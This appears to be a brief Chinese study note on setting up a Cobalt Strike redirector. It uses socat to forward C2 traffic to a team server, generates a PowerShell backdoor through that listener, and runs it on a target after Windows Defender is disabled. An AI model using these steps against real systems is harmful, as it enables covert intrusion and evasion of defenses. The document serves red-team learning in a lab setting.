Y

cobaltstrike简单学习（如何建立一个redirector）

设备需求：一台运行着Linux的系统的云服务器运行socat来转发流量

Linux云服务器的指令如下 sudo apt-get update（更新软件包不然找不到socat） sudo apt-get install socat（安装socat） screen（在Linux中，screen 是一个非常有用的终端多路复用器，它允许用户在一个单一的终端窗口中运行多个会话。使用 screen，你可以在后台运行程序，即使关闭了终端窗口，程序仍然会继续运行。） 注：如何关闭screen的后台会话，首先输入screen -ls（这将列出所有当前正在运行的 screen会话以及id） 输入screen -S [会话ID] -X quit（将 [会话ID] 替换为你想关闭的会话的实际 ID。） 或者进入到该会话中输入exit即可

云服务器输入sudo socat TCP4-LISTEN:80,fork TCP4:你的team服务器ip地址：80 命令的作用是将本地的 80 端口（通常是 HTTP 服务的默认端口）上的流量转发到指定的远程服务器（你的 Team 服务器）的 80 端口。确认对应的防火墙以及端口是否有开放/端口占用 检查80端口占用netstat -nap | grep 80 关闭服务 service apache2 stop（假设apache2正在占用端口号）

此时可以在cs工具里进行配置，通过云服务器的socat服务来访问team服务器 在http hosts里输入云服务器（socat）的ip地址，stager同样输入云服务器ip地址 点击save后 用redirector的ip地址来创建一个powershell后台木马 在localhost里面填入云服务器（redirector）的ip地址 listener选择我们刚刚创建的redirector的监听器 type选择powershell，勾选x64 此时会有一串命令行可以复制； 在靶机上运行win+r，粘贴生成的木马链接，记得关闭windows defender； 此时在cs工具将会有一个有效peyload出现，通过redirector来给我发get/post信息；